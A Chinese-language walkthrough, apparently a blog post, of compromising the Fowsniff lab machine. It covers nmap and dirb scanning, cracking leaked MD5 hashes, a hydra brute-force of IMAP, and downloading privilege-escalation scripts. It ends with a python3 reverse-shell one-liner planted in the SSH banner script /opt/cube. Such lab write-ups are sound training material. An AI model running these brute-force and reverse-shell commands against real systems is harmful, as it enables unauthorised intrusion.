渗透测试实战-Fowsniff靶机入侵

机安装/下载

Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A

 

Kali的IP地址:192.168.100.8

WIN7的IP地址:192.168.100.9

 

 

先用nmap 进行探测

发现目标的IP地址为192.168.100.12

然后在进行靶机端口的探测

先从80端口下手看看

对这个网站进行目录扫描,也就发现目录遍历其他没什么发现

dirb http://192.168.100.12 /usr/share/dirb/wordlists/big.txt 

 

那么根据这些靶机的尿性,突破口肯定是在首页或者其他页面,我们把目光放在首页上

通过首页上的接受,说明网站被人搞了,@fowsniffcorp的信息肯定被攻击者泄漏放在互联网上了,这时候不用怀疑是时候表演表演真正的谷歌技术了,

1.打开谷歌

2.输入 @fowsniffcorp 回车

就出现了这个网站:https://pastebin.com/NrAqVeeX

在这个泄漏的信息里我们拿到一些账户和加密的密码

下一步我们需要把这些md5的密文解密并跟账户分开保存,方便后面的破解工作,批量md5密文解密小弟用了somd5的平台,地址:

https://www.somd5.com/batch.html

 

可以看到只有一个密文无法解密,但是不影响我们继续下一步工作,这个时候我们把目标放在imap服务上,我们先探测一下看看这个服务,小弟这里使用msf来,您也可以在前面探测的时候直接加上nmap的 script模块

可以看到这个服务是正常使用的,下一步我们就是使用刚刚获取到的账户密码破解试试,这里小弟还是继续使用hydra来完成,您也可以使用其他工具,命令如下:

 hydra -L /root/username.txt -P /root/password.txt imap://192.168.100.12
 

成功破解出密码:seina :scoobydoo2,

下一步我们试着登陆看看,到了这里有小伙伴就要问了,这个服务这么登陆呢?这里你可以使用命令行来登陆,也可以使用foxmail来登陆,小弟这里使用foxmail来登陆,配置如下:

 

配置好以后,收到了2个邮件,其中在一个邮件里收到了一个密码,如图:

密码为:S1ck3nBluff+secureshell

 

下面我们使用这个密码去登陆 “baksteen”账户,为什么是他呢?因为第二封邮件他回复了。。。。

成功登陆了,下一步就是提权了,老规矩我们在/tmp目录下下载2个提权脚本,如图:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

下载完后 给这2个文件执行权限

chmod +x LinEnum.sh

chomod +x linuxprivchecker.py

 

 

 

在运行“linuxprivchecker.py”的时候可以看到靶机只安装了python3,

通过另外一个脚本,没发现什么突破口

 

到了这里小弟被卡了一段时间,最后小弟因为下班回家,又重新登陆了一下这个ssh,看到登陆的banner引起了我的警觉… 这尼玛肯定又问题,使用我在用户目录下面查看,如图:

分别cat 那几个带头为点的隐藏文件

 

在vim中操作的行为,vim会自动记录下来保存到.viminfo中

 

cat .viminfo的时候出现了几个可以的sh文件

经过查找测试发现只有/opt/cube能用,我们cd过去

然后发现了一个有价值的东西

vim下

这个就是shell的banner页面

那我们写上python3d的反弹shell代码,连上shell除了执行banner页面还会反弹一个shell

因为这个靶机只有python3 所以要用注意用python3

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.100.8',4545));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

然后我们用kali来监听4545端口

因为这个是显示banner的就是刚登陆ssh的图像,所以这里需要另外开一个命令行,

重新去登陆刚刚“baksteen”ssh账户,如图:

最后拿flag

  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值